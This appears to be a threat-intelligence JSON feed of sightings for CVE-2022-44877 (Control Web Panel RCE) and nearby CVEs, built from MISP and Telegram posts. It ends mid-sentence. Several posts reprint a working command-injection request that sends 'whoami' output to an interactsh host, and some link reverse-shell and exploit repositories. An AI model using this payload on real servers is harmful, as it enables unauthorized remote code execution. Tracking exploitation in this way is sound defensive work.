{"vulnerability": "CVE-2022-4487", "sightings": [{"uuid": "c5a0d98b-fdf2-4e8f-897c-38e3d10da020", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "a5a5008f-67b3-402b-9fbb-6de14289a759", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971755", "content": "", "creation_timestamp": "2024-12-24T20:33:40.714634Z"}, {"uuid": "8e8fff02-daed-449e-ae39-e6d0056029b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "2a79d232-8915-43c6-9f28-32509c09244b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:49.000000Z"}, {"uuid": "69aed977-f504-4263-b5c8-9ef64fa79095", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/control_web_panel_login_cmd_exec.rb", "content": "", "creation_timestamp": "2023-01-31T14:53:19.000000Z"}, {"uuid": "415903d4-4ba5-4482-94ee-5a059dd2eb6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:40.000000Z"}, {"uuid": "791da008-8cee-4d4d-a29c-3e3bff2bd236", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:03.000000Z"}, {"uuid": "357fe18c-c90e-45b2-a19b-c1d6a7b2a294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/cKure/10601", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 \ud83d\udce2 CVE-2022-44877: Vulnerability with 9.8 severity in Centos Web Panel 7.0 is under active exploit.\n\nIt is an unauthenticated RCE.\n\nhttps://arstechnica.com/information-technology/2023/01/vulnerability-with-9-8-severity-in-control-web-panel-is-under-active-exploit/", "creation_timestamp": "2023-01-13T11:15:59.000000Z"}, {"uuid": "f3fc014f-fb6f-4cdd-a6b2-138dfb373d00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/8419ae1b-d239-4b01-a77a-b24315ae92fb", "content": "", "creation_timestamp": "2026-02-02T12:27:06.398006Z"}, {"uuid": "95ebbc1b-7a82-46f7-aa7b-90d7898fa27c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3935", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aRed Team\n\u63cf\u8ff0\uff1aRed Team utilities for setting up CWP CentOS 7 payload &amp; reverse shell (Red Team 9 - CW2023)\nURL\uff1ahttps://github.com/hotpotcookie/CVE-2022-44877-white-box\n\n\u6807\u7b7e\uff1a#Red Team", "creation_timestamp": "2023-03-13T04:32:52.000000Z"}, {"uuid": "09e71e67-cfbd-4f67-9ddd-62d4d11a24ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44875", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6761", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-44875\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: KioWare through 8.33 on Windows sets KioScriptingUrlACL.AclActions.AllowHigh for the about:blank origin, which allows attackers to obtain SYSTEM access via KioUtils.Execute in JavaScript code.\n\ud83d\udccf Published: 2023-03-06T00:00:00.000Z\n\ud83d\udccf Modified: 2025-03-06T20:41:24.047Z\n\ud83d\udd17 References:\n1. https://www.kioware.com/versionhistory.aspx?pid=15\n2. https://github.com/olnor18/writeup/tree/master/CVE/CVE-2022-44875", "creation_timestamp": "2025-03-06T21:34:30.000000Z"}, {"uuid": "3ed0f882-8a4f-42da-8fe0-277f20b09886", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44874", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12795", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-44874\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: wasm3 commit 7890a2097569fde845881e0b352d813573e371f9 was discovered to contain a segmentation fault via the component op_CallIndirect at /m3_exec.h.\n\ud83d\udccf Published: 2022-12-13T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T03:20:52.649Z\n\ud83d\udd17 References:\n1. https://github.com/wasm3/wasm3/issues/380", "creation_timestamp": "2025-04-22T04:03:18.000000Z"}, {"uuid": "6bd65a6e-4bf2-4bfc-bd95-ad66d2dafe6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3789", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aRed Team\n\u63cf\u8ff0\uff1aRed Team utilities for setting up CWP CentOS 7 payload &amp; reverse shell, as it refers to CVE-2022-44877\nURL\uff1ahttps://github.com/hotpotcookie/cwp-rce-white-box\n\n\u6807\u7b7e\uff1a#Red Team", "creation_timestamp": "2023-02-15T15:27:38.000000Z"}, {"uuid": "ef0bdcd7-7d8c-46a2-9284-e65e8fd8045c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44875", "type": "seen", "source": "Telegram/vWoCpVxG9Mcw8_H7wdgsnOOkCXbaBbj0nbxIyAUqy5tST0l2", "content": "", "creation_timestamp": "2025-03-08T04:34:55.000000Z"}, {"uuid": "c0ab54c2-d456-4571-89e0-c0e76acf9e34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44870", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11162", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-44870\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module.\n\ud83d\udccf Published: 2023-01-06T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-09T20:38:15.099Z\n\ud83d\udd17 References:\n1. https://github.com/magicblack/maccms10/issues/986\n2. https://github.com/Cedric1314/CVE-2022-44870/blob/main/README.md", "creation_timestamp": "2025-04-09T20:48:26.000000Z"}, {"uuid": "2d4d004e-6d66-454a-92b1-3641e860120b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://t.me/ctinow/87854", "content": "US CISA adds Centos Web Panel RCE CVE-2022-44877 to its\u00a0Known Exploited Vulnerabilities Catalog\n\nhttps://ift.tt/feAN6wi", "creation_timestamp": "2023-01-19T11:38:15.000000Z"}, {"uuid": "480baea3-cbed-4a24-8d68-bf205aecd6a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://t.me/EthicalSecure/46", "content": "\ud83d\udcbb CrystalRay xakerlar guruhi va SSH-Snake qurti\n\nSysdig tadqiqotchilari joriy yilning fevral oyidan buyon 1500 dan ortiq qurbonlarning ma'lumotlarini o'g'irlagan va ularning tizimlariga kriptominerlarni o'rnatgan CrystalRay nomli yangi kiberjinoyatchilar guruhi haqida xabar berishdi .\n\nBu xakerlar assotsiatsiyasi buzilgan serverlardan SSH kalitlarini o'g'irlaydigan va buzilgan tarmoqlar bo'ylab mustaqil ravishda tarqaladigan SSH-Snake qurtidan foydalanadi.\n\nCrystalRay Shodan kabi xizmatlar orqali ommaviy skanerlashdan foydalanadi, zaifliklardan foydalanadi va orqa eshiklarni o'rnatadi. Jinoyatchilar o'z hujumlarida zmap, asn, httpx, yadrolar, platypus va SSH-Snake vositalaridan foydalanadilar.\n\nGuruhning asosiy maqsadi hisob ma'lumotlarini o'g'irlash va sotish, kriptominerlarni o'rnatish va qurbonlar tizimlariga kirishni ta'minlashdir. Ular o'zgartirilgan ekspluatatsiyalar va Sliver asboblar to'plamidan foydalanadilar.\n\nCrystalRay o'z faoliyatida quyidagi zaifliklardan faol foydalanadi:\n\n\ud83d\uddc4 CVE-2022-44877 : Boshqaruv veb-panelidagi (CWP) zaiflik;\n\n\ud83d\uddc4 CVE-2021-3129 : Ignition-da xato (Laravel);\n\n\ud83d\uddc4 CVE-2019-18394 : Ignite Realtime Openfire-da zaiflik.\n\nSSH kalitlarini olgandan so'ng, SSH-Snake qurti ulardan yangi tizimlarga kirish, o'zini nusxalash va yangi xostlarda jarayonni takrorlash uchun foydalanadi. Bundan tashqari, SSH-Snake nafaqat infektsiyani tarqatadi, balki qo'lga kiritilgan kalitlarni va hujumlar tarixini xakerlarning C2 serveriga yuboradi va keyingi hujumlar uchun imkoniyatlar yaratadi.\n\n@EthicalSecure", "creation_timestamp": "2025-06-25T05:46:17.000000Z"}, {"uuid": "b7a66f8a-3253-4848-b552-50a68c72de5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/ctinow/86969", "content": "Control Web Panel Vulnerability, CVE-2022-44877, Actively Exploited in the Wild - Security Boulevard\n\nhttps://ift.tt/EAY3VUu", "creation_timestamp": "2023-01-14T13:46:42.000000Z"}, {"uuid": "03e41d23-1787-41fc-baa7-a37c8bfee294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/ctinow/86963", "content": "Control Web Panel Vulnerability, CVE-2022-44877, Actively Exploited in the Wild\n\nhttps://ift.tt/EAY3VUu", "creation_timestamp": "2023-01-14T10:56:27.000000Z"}, {"uuid": "09d70b4e-d481-4892-882d-8dc298f6bcbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/gjl5Uy3V92u60R1A6ThsEPRpU8GiWdUXTnqzjNgz90vk3Tk", "content": "", "creation_timestamp": "2023-02-02T06:35:01.000000Z"}, {"uuid": "93425ddf-67da-4522-a62c-f14963a1b431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/jMJyadT3qc-lkVlS3NqgZVp45jvUhGcXJlopuseaLsWvi6M", "content": "", "creation_timestamp": "2023-04-01T14:25:41.000000Z"}, {"uuid": "bc0c378f-35cb-4c05-82cf-331e27d66b98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/dnB1GUjf0v9LFGmoVZrpJEAc_h4H9AJQZzfZfG_3ZxYWjuY", "content": "", "creation_timestamp": "2023-03-31T20:23:19.000000Z"}, {"uuid": "020921a0-017f-4415-b572-e6b3d2e04d8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/9VSrl9zLun59PPbfDpr8xiPX8yfhb9CmNOfmFPOZuDJD3w", "content": "", "creation_timestamp": "2024-05-05T11:58:13.000000Z"}, {"uuid": "936cb716-7234-4985-8a67-3c2a7ea1bd36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "Telegram/LBlGBEhemJZkwQPO2E1CN0fUgXVoXgX8BpkxvKB6zhychcA", "content": "", "creation_timestamp": "2023-01-17T10:27:05.000000Z"}, {"uuid": "7e5e619a-4b79-40b3-b828-619cdacc6532", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/jj_8tl/74", "content": "#CVE-2022-44877 Control Web Panel Unauth #RCE \n\nPOC: \nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login", "creation_timestamp": "2024-11-24T14:30:15.000000Z"}, {"uuid": "5fe42db6-9702-45b0-b71d-f40a4d3a7758", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/4192", "content": "CVE-2022-44877\n\nControl Web Panel Unauth RCE\n\nPOC usage:\n\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login", "creation_timestamp": "2024-05-04T07:41:16.000000Z"}, {"uuid": "0fbc0436-d3a0-4142-8b35-b557b136178e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://t.me/arpsyndicate/268", "content": "#ExploitObserverAlert\n\nCVE-2022-44877\n\nDESCRIPTION: Exploit Observer has 37 entries related to CVE-2022-44877. login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.\n\nFIRST-EPSS: 0.974350000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-11-19T14:48:50.000000Z"}, {"uuid": "3737c36d-dcad-49e3-a89d-6c83d335cb62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44875", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3126", "content": "Tools \ud83d\udd27 \ud83d\udd28 \ud83d\udd27 \ud83d\udd28  - Hackers Factory\n\n\u200b\u200bTor / Darknet Links\n\nVerified darknet market and darknet service links on the Tor Network.\n\nhttps://github.com/DarkNetEye/tor-links\n\nWeb:\nhttps://darkneteye.com/\n\n#cybersecurity #infosec #privacy\n\n\u200b\u200bDragondoom\n\nThe PAKE Dragonfly is used as SAE in WPA3 authentication. A critical point during the authentication is when the password needs to be derived into an elliptic curve point.\n\nhttps://gitlab.inria.fr/ddealmei/artifact_dragondoom\n\n#cybersecurity #infosec\n\n\u200b\u200bwhatlicense\n\nFull tool chain to extract WinLicense secrets from a protected program then launch it bypassing all verification steps, utlizing an Intel PIN tool and license file builder.\n\nhttps://github.com/charlesnathansmith/whatlicense\n\n#infosec #pentesting #bugbounty\n\n\u200b\u200bCVE-2022-44875\n\nTesting CVE-2022-44875\n\nhttps://github.com/c0d30d1n/CVE-2022-44875-Test\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bWiFi-OSINT\n\nSome great Wifi, resources, tools and blogs if Wi-Fi #OSINT is your thing.\n\nhttps://github.com/cqcore/WiFi-OSINT\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bCVE-2023-35885\n\nCloudpanel 0-day Exploit\n\nhttps://github.com/datackmy/FallingSkies-CVE-2023-35885\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCVE-2023-3519\n\nThis script is a basic Citrix Scanner for CVE-2023-3519. We try to identify vulnerable Citrix Gateways/ADCs by looking at the HTTP headers.\n\nhttps://github.com/telekom-security/cve-2023-3519-citrix-scanner\n\n#cve #infosec #pentesting\n\n\u200b\u200bvala-vala-hey\n\nThis is a 0day root LPE for latest #Manjaro distro, tested on embedded ARM and x86_64 desktop installs.\n\nhttps://github.com/c-skills/vala-vala-hey\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCVE-2020-1472\n\nA Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472).\n\nhttps://github.com/SecuraBV/CVE-2020-1472\n\n#cve #cybersecurity #infosec\n\nEX-SQLi\n\nA tool for scanning and exploiting the famous SQL injection vulnerability in more than millions of sites. The exploit was programmed by the TYG team.\n\nhttps://github.com/mr-sami-x/SQLi\n\n#infosec #pentesting #redteam\n\n\u200b\u200bCVE-2023-38632\n\nAsync-sockets-cpp &lt;0.3.1 TCP Packet tcpsocket.hpp Stack-based Overflow\n\nhttps://github.com/Halcy0nic/CVE-2023-38632\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCVE-2023-3519\n\nThis Nuclei template checks for the presence of the CVE-2023-3519 vulnerability in a target web server.\n\nhttps://github.com/SalehLardhi/CVE-2023-3519\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bCVE-2023-28121\n\nWooCommerce Payments: Unauthorized Admin Access #Exploit.\n\nhttps://github.com/gbrsh/CVE-2023-28121\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bVanMoof Encryption Key Exporter\n\nExport all bike details (such as encryption key) of your VanMoof bikes.\n\nhttps://github.com/grossartig/vanmoof-encryption-key-exporter\n\nWeb:\nhttps://keyexporter.grossartig.io/\n\n#cybersecurity #infosec\n\n\u200b\u200bPowershellKerberos\n\nSome scripts to abuse kerberos using Powershell.\n\nhttps://github.com/MzHmO/PowershellKerberos\n\n#infosec #pentesting #redteam\n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-07-23T12:08:55.000000Z"}, {"uuid": "b18f58ea-74fd-4fb4-b233-93d01fa4ad24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/Web_Security_Live/54", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Contol Panel \u2014 CVE-2022-44877\n\n9,8/10 \u0431\u0430\u043b\u043b\u043e\u0432 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS. \n3 \u044f\u043d\u0432\u0430\u0440\u044f 2023 \u0433\u043e\u0434\u0430 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b Gais Cyber   Security \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u043e\u043a\u0442\u044f\u0431\u0440\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434 \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\u0422\u0440\u0438 \u0434\u043d\u044f \u0441\u043f\u0443\u0441\u0442\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0443\u0436\u0435 \u0432\u0437\u044f\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430 \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u0438\u0435, \u0442\u0430\u043a \u043a\u0430\u043a \u0441 \u0435\u0435 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043d\u0435\u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u043c \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u043c\u0430\u0448\u0438\u043d\u044b.\n\nCVE-2022-44877 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0435 \u0432 \u043e\u043a\u0442\u044f\u0431\u0440\u0435 2022 \u0433\u043e\u0434\u0430, \u0432 \u0441\u043e\u0441\u0442\u0430\u0432\u0435 CWP 0.9.8.1147.\n\n\ud83d\udd18 https://t.me/web_security_live", "creation_timestamp": "2023-01-16T13:26:13.000000Z"}, {"uuid": "be3bae59-ea43-4182-91c0-892694bfbc0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/647", "content": "CVE-2022-44877 : Centos Web Panel 7 - Unauthenticated Remote Code Execution \nPOC : https://github.com/numanturle/CVE-2022-44877", "creation_timestamp": "2023-01-07T18:30:10.000000Z"}, {"uuid": "7fb967a4-aaba-47f7-b3ca-361209b82295", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1271", "content": "CVE-2022-44877\nControl Web Panel Unauth RCE\nPOC usage:\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login", "creation_timestamp": "2023-01-08T18:21:47.000000Z"}, {"uuid": "b20ad28f-4019-4a7b-8040-ede2f4996c44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1261", "content": "CVE-2022-44877\nCentos Web Panel 7 Unauthenticated Remote Code Execution\ndownload\n\n#centos #rce", "creation_timestamp": "2023-01-06T08:11:28.000000Z"}, {"uuid": "c6df947f-49af-4f3c-8617-467cce9f5c36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/-Agm6CxDAHpFekuPHljhtLzEIw4YdZciyyWEP66WVyC4Mao", "content": "", "creation_timestamp": "2023-02-01T14:26:05.000000Z"}, {"uuid": "15314648-fbc4-4e93-8db0-3fa75d0c6bf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "Telegram/AY73a6VopayuGS3sFVnT6risuhBjZYNN4wypwEk7jXZmWRA", "content": "", "creation_timestamp": "2023-02-01T08:26:05.000000Z"}, {"uuid": "e2e0008d-4792-4fa6-91f7-2e3da9dbdcaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/1102", "content": "CVE-2022-44877 \u06a9\u0646\u062a\u0631\u0644 \u067e\u0646\u0644 \u0648\u0628 \u0628\u062f\u0648\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a #RCE\n\n\u0627\u062b\u0628\u0627\u062a \u0645\u0641\u0647\u0648\u0645:\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login\nCVE-2022-44877 Control Web Panel Unauth #RCE \n\nPOC: \nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login", "creation_timestamp": "2024-05-11T19:55:16.000000Z"}, {"uuid": "5a9a1542-1eb5-453c-9202-3706adfcbfc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://t.me/cibsecurity/56025", "content": "\u203c CVE-2022-44877 \u203c\n\nRESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-01-06T02:19:20.000000Z"}, {"uuid": "d3dc6343-b881-4a1c-93e2-7cc57e669cf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/true_secator/3934", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f CVE-2022-44877 \u0441 \u043e\u0446\u0435\u043d\u043a\u043e\u0439 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 9,8 \u0438\u0437 10, \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0432 Control Web Panel (\u0440\u0430\u043d\u0435\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u043c \u043a\u0430\u043a CentOS Web Panel), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e 